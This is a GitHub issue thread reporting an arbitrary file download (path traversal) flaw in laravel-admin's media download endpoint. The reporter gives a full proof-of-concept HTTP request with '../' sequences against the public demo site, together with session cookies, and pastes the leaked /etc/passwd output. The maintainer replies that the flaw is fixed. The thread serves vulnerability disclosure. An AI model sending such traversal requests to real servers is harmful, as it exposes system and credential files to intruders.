### ISSUE TITLE
任意文件下载漏洞

### ISSUE THREAD

**Issue by leis1** [z-song/laravel-admin#4283]
- Laravel Version: last
- PHP Version: 7.4
- Laravel-admin: #.#.#

### Description:
任意文件下载漏洞

### Steps To Reproduce:
`GET /media/download?file=../../../../../../../etc/passwd HTTP/1.1
Host: demo.laravel-admin.org
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.56
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://demo.laravel-admin.org/media?path=%2Fimages
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: remember_admin_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IklmMjRGV1h4aXBnRFJJV3NKdll0M0E9PSIsInZhbHVlIjoieTZMRFBUcWFLVExkZ0pNQlVZMXg1RHZhdGl5ZEFvVlVQQnZRTElvbGxzNW5MK05Pbnc3XC91U0pMd0ZXR3ZpUkpabXpxMmdYU3d2RzM3Ulwva3JJVUJZMVFrYzlMbEV2alNsaXJ0eXJHZVBLU1ZzTENtYWk3RHlJSUJyYTRkZVJ5WE5CeE5INDFzUkdkNlwvY2FVbTM4VEd2S0R3RUJUcVVMOXF1TGpZaDNjZnlJPSIsIm1hYyI6ImM0ZWRiMzk1OThlYTc5NzVkNDQ4ZWYzYjNjMmY0ODdkY2RjMWQ1NGM4MWFiNjI3OTViZjk3YjUyOTUzMWQ3MzAifQ%3D%3D; XSRF-TOKEN=eyJpdiI6IlhLYkpIRjFOTmcydkVGdnBFS2FITWc9PSIsInZhbHVlIjoiYzR4T05mVCtUMmZJQXJ6emFsamlOZEwxWHhNSEFTVnU5RVFmRHlwRjJ2VjcrQ3F6a2ZIbmROdkdwNUFBbHg3TiIsIm1hYyI6IjU2YmY5Mzg3NTE2MWZlM2MxYmZjM2Q1ZmU2ODQ2MTUwODc0ZDhkYjE0MmYyY2NmNGJlMDA5NTRmYmQxYzQzYTUifQ%3D%3D; laravel_session=eyJpdiI6ImREMU9xVkUyWDBDMXZuTEJlZ3h6OGc9PSIsInZhbHVlIjoiR0lGWjBcL0F4UG8zVmZ3ZDd1Tmd4NGw4dTlCOU0reHlVNURnQUJraG45eXNyZFNxdzZDTGhyM25EZ2tsVTZMOFkiLCJtYWMiOiIxNWY2ZWEyZDk2NmFhNDkxMDM3OGMwNTY4ZDI5NWYxMDllM2JlZmI3MmRkNTAxMzRlMmRmYWRmZDI1ZTA0MTU0In0%3D
`

`root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
systemd-bus-proxy:x:999:997:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:998:996:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:995:User for polkitd:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
libstoragemgmt:x:996:994:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:995:993::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nginx:x:994:992:Nginx web server:/var/lib/nginx:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false`

**Comment by z-song** [comment]
已经修复  谢谢指出
